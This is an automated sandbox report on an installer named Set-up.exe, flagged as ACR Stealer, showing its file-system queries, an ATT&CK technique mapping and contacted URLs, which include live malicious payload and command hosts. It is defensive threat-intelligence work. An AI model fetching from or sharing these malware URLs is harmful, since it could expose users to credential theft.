Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\Default\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\Default\Documents	Jump to behavior

Source: Yara match	File source: 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Set-up.exe PID: 7468, type: MEMORYSTR

Remote Access Functionality

Yara detected ACR Stealer

Source: Yara match

File source: Process Memory Space: Set-up.exe PID: 7468, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	311 Process Injection	311 Process Injection	3 OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	1 Abuse Elevation Control Mechanism	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	51 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 DLL Side-Loading	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	12 System Information Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction

Source	Detection	Scanner	Label	Link
Set-up.exe	6%	ReversingLabs
SAMPLE	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://acs.amazonaws.com/groups/global/AllUsers	0%	Avira URL Cloud	safe
https://www.fsf.org/	0%	Avira URL Cloud	safe
http://169.254.169.254/latest/meta-data/iam/security-credentials/Retrieving	0%	Avira URL Cloud	safe
https://jrsoftware.org/tb2kdl.php	0%	Avira URL Cloud	safe
http://webdav.org/neon/hooks/webdav-lockingHas	0%	Avira URL Cloud	safe
http://h1.coldwalk.top/sh.ext.exe.bin	0%	Avira URL Cloud	safe
http://webdav.org/neon/hooks/webdav-lockinghttp://webdav.org/neon/hooks/webdav-lockingLocked	0%	Avira URL Cloud	safe
http://webdav.org/neon/hooks/server-authhttp://webdav.org/neon/hooks/proxy-authhttp://webdav.org/neo	0%	Avira URL Cloud	safe
http://www.webdav.org/neon/hooks/http-redirecthttp://www.webdav.org/neon/hooks/http-redirectAborted	0%	Avira URL Cloud	safe
http://mcrsftuptade.pro/Up/g	100%	Avira URL Cloud	malware
http://mcrsftuptade.pro/Up/p	100%	Avira URL Cloud	malware
http://webdav.org/neon/hooks/proxy-auth	0%	Avira URL Cloud	safe
http://acs.amazonaws.com/groups/s3/LogDelivery	0%	Avira URL Cloud	safe
http://mcrsftuptade.pro/Up/b	100%	Avira URL Cloud	malware
http://webdav.org/neon/hooks/webdav-locking	0%	Avira URL Cloud	safe
http://webdav.org/neon/hooks/proxy-authProxy-AuthorizationProxy-AuthenticateProxy-Authentication-Inf	0%	Avira URL Cloud	safe
http://www.webdav.org/neon/hooks/http-passport-req	0%	Avira URL Cloud	safe
http://h1.coldwalk.top/amshm.bin	0%	Avira URL Cloud	safe
http://www.webdav.org/neon/hooks/http-redirect	0%	Avira URL Cloud	safe
http://XXXXXXwinscp.net/	0%	Avira URL Cloud	safe
http://mcrsftuptade.pro/ujs/f1575b64-8492-4e8b-b102-4d26e8c70371	100%	Avira URL Cloud	malware
https://openssl-library.org/)WebDAV/HTTP	0%	Avira URL Cloud	safe
http://mcrsftuptade.pro/Up	100%	Avira URL Cloud	malware
http://webdav.org/neon/hooks/server-auth	0%	Avira URL Cloud	safe
https://jcl.delphi-jedi.org/	0%	Avira URL Cloud	safe
http://www.webdav.org/neon/hooks/http-passport-reqWWW-AuthenticatePassport1.4Passport1.4http://www.w	0%	Avira URL Cloud	safe
http://webdav.org/neon/hooks/webdav-lockinghttp://webdav.org/neon/hooks/webdav-lockinglock:	0%	Avira URL Cloud	safe
http://XXXXwinscp.net/forum/	0%	Avira URL Cloud	safe
https://notroj.github.io/neon/	0%	Avira URL Cloud	safe
http://acs.amazonaws.com/groups/global/AuthenticatedUsers	0%	Avira URL Cloud	safe
http://webdav.org/neon/hooks/server-authAuthorizationWWW-AuthenticateAuthentication-InfoCould	0%	Avira URL Cloud	safe
http://h1.coldwalk.top/shark.bin	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	high
pki-goog.l.google.com	142.250.68.227	true	false	high
c.pki.goog	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://mcrsftuptade.pro/Up/g	true	Avira URL Cloud: malware	unknown
http://mcrsftuptade.pro/Up/p	true	Avira URL Cloud: malware	unknown
http://mcrsftuptade.pro/Up/b	true	Avira URL Cloud: malware	unknown
http://mcrsftuptade.pro/ujs/f1575b64-8492-4e8b-b102-4d26e8c70371	true	Avira URL Cloud: malware	unknown
http://mcrsftuptade.pro/Up	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://acs.amazonaws.com/groups/global/AllUsers	Set-up.exe	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.fsf.org/	Set-up.exe	false	Avira URL Cloud: safe	unknown
http://169.254.169.254/latest/meta-data/iam/security-credentials/Retrieving	Set-up.exe	false	Avira URL Cloud: safe	unknown
http://h1.coldwalk.top/sh.ext.exe.bin	Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jrsoftware.org/tb2kdl.php	Set-up.exe	false	Avira URL Cloud: safe	unknown
https://winscp.net/eng/docs/?ver=%s&lang=%s-https://winscp.net/eng/docs/%s?ver=%s&lang=%s	Set-up.exe	false		high
http://webdav.org/neon/hooks/webdav-lockingHas	Set-up.exe	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/envelope/	Set-up.exe	false		high
http://webdav.org/neon/hooks/webdav-lockinghttp://webdav.org/neon/hooks/webdav-lockingLocked	Set-up.exe	false	Avira URL Cloud: safe	unknown
https://winscp.net/eng/donate.php	Set-up.exe	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Set-up.exe, 00000000.00000003.1633962539.0000000010C78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643211493.0000000010B08000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643003393.0000000010BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://webdav.org/neon/hooks/server-authhttp://webdav.org/neon/hooks/proxy-authhttp://webdav.org/neo	Set-up.exe	false	Avira URL Cloud: safe	unknown
http://www.webdav.org/neon/hooks/http-redirecthttp://www.webdav.org/neon/hooks/http-redirectAborted	Set-up.exe	false	Avira URL Cloud: safe	unknown
http://webdav.org/neon/hooks/proxy-auth	Set-up.exe	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	Set-up.exe, 00000000.00000003.1633962539.0000000010C78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643211493.0000000010B08000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643003393.0000000010BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.borland.com/namespaces/Types	Set-up.exe	false		high
https://www.chiark.greenend.org.uk/~sgtatham/putty/	Set-up.exe	false		high
http://x1.c.lencr.org/0	Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	false		high
http://acs.amazonaws.com/groups/s3/LogDelivery	Set-up.exe	false	Avira URL Cloud: safe	unknown
https://winscp.net/#https://winscp.net/eng/docs/history	Set-up.exe	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Set-up.exe, 00000000.00000003.1633962539.0000000010C78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643211493.0000000010B08000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643003393.0000000010BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://apache.org/dav/propset/fs/1	Set-up.exe	false		high
https://duckduckgo.com/chrome_newtabv209h	Set-up.exe, 00000000.00000003.1633962539.0000000010C78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643211493.0000000010B08000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643003393.0000000010BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://winscp.net/updates.php#https://winscp.net/eng/download.php	Set-up.exe	false		high
https://www.gnu.org/licenses/why-not-lgpl.html	Set-up.exe	false		high
http://webdav.org/neon/hooks/proxy-authProxy-AuthorizationProxy-AuthenticateProxy-Authentication-Inf	Set-up.exe	false	Avira URL Cloud: safe	unknown
http://webdav.org/neon/hooks/webdav-locking	Set-up.exe	false	Avira URL Cloud: safe	unknown
http://apache.org/dav/props/T	Set-up.exe	false		high
http://www.webdav.org/neon/hooks/http-redirect	Set-up.exe	false	Avira URL Cloud: safe	unknown
http://h1.coldwalk.top/amshm.bin	Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.webdav.org/neon/hooks/http-passport-req	Set-up.exe	false	Avira URL Cloud: safe	unknown
http://XXXXXXwinscp.net/	Set-up.exe	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	Set-up.exe	false		high
https://openssl-library.org/)WebDAV/HTTP	Set-up.exe	false	Avira URL Cloud: safe	unknown
https://www.gnu.org/licenses/	Set-up.exe	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org?q=	chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.7.dr	false		high
http://ocsp.rootca1.amazontrust.com0:	Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	false		high
https://jcl.delphi-jedi.org/	Set-up.exe	false	Avira URL Cloud: safe	unknown
http://www.webdav.org/neon/hooks/http-passport-reqWWW-AuthenticatePassport1.4Passport1.4http://www.w	Set-up.exe	false	Avira URL Cloud: safe	unknown
http://webdav.org/neon/hooks/server-auth	Set-up.exe	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/v20	Set-up.exe, 00000000.00000003.1633962539.0000000010C78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643211493.0000000010B08000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643003393.0000000010BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://XXXXwinscp.net/forum/	Set-up.exe	false	Avira URL Cloud: safe	unknown
https://github.com/bji/libs30https://github.com/bji/libs3/blob/master/LICENSE$Error	Set-up.exe	false		high
https://winscp.net/D	Set-up.exe	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/UweRaabe/PngComponents	Set-up.exe	false		high
https://winscp.net/forum/	Set-up.exe	false		high
http://winscp.net/schema/session/1.0	Set-up.exe	false		high
http://apache.org/dav/props/	Set-up.exe	false		high
http://webdav.org/neon/hooks/server-authAuthorizationWWW-AuthenticateAuthentication-InfoCould	Set-up.exe	false	Avira URL Cloud: safe	unknown
http://webdav.org/neon/hooks/webdav-lockinghttp://webdav.org/neon/hooks/webdav-lockinglock:	Set-up.exe	false	Avira URL Cloud: safe	unknown
https://winscp.net/eng/translations.php:https://winscp.net/eng/docs/search.php?ver=%s&lang=%s&q=%sKh	Set-up.exe	false		high
http://acs.amazonaws.com/groups/global/AuthenticatedUsers	Set-up.exe	false	Avira URL Cloud: safe	unknown
https://notroj.github.io/neon/	Set-up.exe	false	Avira URL Cloud: safe	unknown
https://filezilla-project.org/bThis	Set-up.exe	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gemini.google.com/app?q=	chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://h1.coldwalk.top/shark.bin	Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/plashenkov/TBX	Set-up.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	unknown	European Union		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1686587
Start date and time:	2025-05-10 08:04:18 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	39
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Set-up.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@30/49@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 45 Number of non-executed functions: 13
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): c2a9c95e369881c67228a6591cac2686.clo.footprintdns.com, ax-ring.msedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, www.microsoft.com, wu-b-net.trafficmanager.net, casoneroutegold-prod-bggfgca0dkaag8a8.b01.azurefd.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	Set-up_patched.exe	Get hash	malicious	ACR Stealer	Browse	mcrsftuptade.pro/Up/g
	Set-up_patched.exe	Get hash	malicious	ACR Stealer	Browse	mcrsftuptade.pro/Up/g
	http://188.114.96.3	Get hash	malicious	Unknown	Browse	188.114.96.3/favicon.ico
	g1V10ssekg.exe	Get hash	malicious	FormBook	Browse	www.comebackhome.online/dv29/?UPV=lyDuWv8anyDzCsrsL6PTwCreB/WdAINc3G6wsV0rNYv9zNmSH7KTJBB1K2WfFvHvPOh/z5cHktk3l1356pnt1M3PZl4mowifUTZkIWOf1ffB0d/Fsg==&YrV=FlsDgRMx
	http://facebooksupports.tempisite.com/ils972/	Get hash	malicious	Unknown	Browse	facebooksupports.tempisite.com/favicon.ico
	AGODA COMPANY PTE LTD.exe	Get hash	malicious	FormBook	Browse	www.baurishu.info/6oy6/
	file.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.actpisalnplay.cyou/3vjo/
	RFQPO-AA132426.exe	Get hash	malicious	FormBook	Browse	www.actpisalnplay.cyou/3vjo/
	Swift copy.exe	Get hash	malicious	FormBook	Browse	www.desktitle.homes/izqs/
	http://www.brillflooring.com	Get hash	malicious	Unknown	Browse	www.brillflooring.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
pki-goog.l.google.com	u6t3WoUyrJ.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	192.178.49.195
	WOECzw7oOz.exe	Get hash	malicious	Unknown	Browse	192.178.49.195
	CLnnmbrznV.exe	Get hash	malicious	AgentTesla, DarkCloud	Browse	192.178.49.195
	1yW2V8VvTy.exe	Get hash	malicious	GuLoader	Browse	192.178.49.195
	rby5N5FJIu.exe	Get hash	malicious	Unknown	Browse	192.178.49.195
	04Yo5SC4oU.exe	Get hash	malicious	FormBook	Browse	192.178.49.195
	SnFyLGyeIx.exe	Get hash	malicious	GuLoader	Browse	192.178.49.195
	zNvFRQgSSE.exe	Get hash	malicious	FormBook	Browse	192.178.49.195
	cMGfYfCkcl.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	192.178.49.195
	MZNqpePipr.exe	Get hash	malicious	FormBook	Browse	192.178.49.195
bg.microsoft.map.fastly.net	u6t3WoUyrJ.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	199.232.214.172
	WOECzw7oOz.exe	Get hash	malicious	Unknown	Browse	199.232.214.172
	CLnnmbrznV.exe	Get hash	malicious	AgentTesla, DarkCloud	Browse	199.232.214.172
	1yW2V8VvTy.exe	Get hash	malicious	GuLoader	Browse	199.232.214.172
	rby5N5FJIu.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	6DwHf43TQa.exe	Get hash	malicious	Snake Keylogger	Browse	199.232.210.172
	04Yo5SC4oU.exe	Get hash	malicious	FormBook	Browse	199.232.210.172
	SnFyLGyeIx.exe	Get hash	malicious	GuLoader	Browse	199.232.214.172
	1UXBBKciUB.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	199.232.214.172
	zNvFRQgSSE.exe	Get hash	malicious	FormBook	Browse	199.232.214.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	OYNXZnHEXq.exe	Get hash	malicious	FormBook	Browse	104.21.64.1
	Eab2SbtQbr.exe	Get hash	malicious	FormBook	Browse	104.21.48.1
	A2RVVD9AhJ.exe	Get hash	malicious	FormBook	Browse	104.21.112.1
	GS4TX46Pz7.exe	Get hash	malicious	FormBook	Browse	104.21.48.1
	cdsuXkNCvF.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	nTTTS39M11.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	FjPUv889pO.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.112.1
	8MF8j3kB7J.exe	Get hash	malicious	FormBook	Browse	104.21.91.219
	LiVjGnY5Hx.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.112.1
	88ukoO6Zln.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_chrome.exe_6529d8499c11cd4f9e25b8c1dc6756637128dac_19d51899_09214adb-9fd0-44c0-a0e9-1d32bf30b89f\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7021443154296074
Encrypted:	false
SSDEEP:	96:pi82svinsrEoZGNfCQXIDcQic6ycEJcw3++HbHu2A2Z+ZwfZAX/d5FMT2SlPkpXE:d2bnb0c2TTj2zuiFWZ24lO89T
MD5:	E7A709D5BCB7CB479C0FF6D515E80F03
SHA1:	524A8ED7292AE20FA150C81F8FC4977DB29BA278
SHA-256:	DAF8676D4795111BFAAB9BCFCA2224126E7100FFDCC2504FCF857FCF3B0AA8ED
SHA-512:	BEF73F6D92017BF49AD6417FEAA64DAF327BCB60BBC5B7FF4424F6E54D580BDD6519054BE3556961B33929516D4FCEF55A0FB50E16061417BFABFC6B7AABE4E6
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.9.1.3.3.0.7.3.9.5.9.6.6.3.7.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.1.3.1.0.7.2.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.9.2.1.4.a.d.b.-.9.f.d.0.-.4.4.c.0.-.a.0.e.9.-.1.d.3.2.b.f.3.0.b.8.9.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.6.8.d.8.b.0.4.-.f.e.3.5.-.4.8.3.5.-.a.2.4.1.-.b.8.8.b.d.e.d.4.4.5.6.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.c.h.r.o.m.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.c.h.r.o.m.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.9.8.c.-.0.0.0.1.-.0.0.1.8.-.2.f.3.8.-.9.e.8.d.7.1.c.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.b.e.e.b.f.9.6.7.c.b.7.5.7.3.a.a.9.7.d.c.2.a.8.8.f.1.7.f.f.3.c.5.0.0.0.0.f.f.f.f.!.0.0.0.0.2.e.c.d.9.2.4.3.e.1.6.8.4.3.6.9.7.1.a.5.c.8.3.c.1.3.2.7.8.1.d.f.3.7.7.c.7.e.d.c.!.c.h.r.o.m.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.5././.0.2././.2.5.:.2.0.:.0.6.:.0.8.!.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_chrome.exe_6529d8499c11cd4f9e25b8c1dc6756637128dac_19d51899_839c2440-3000-4f8a-b3ac-c02cf614e8a6\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7019975156227963
Encrypted:	false
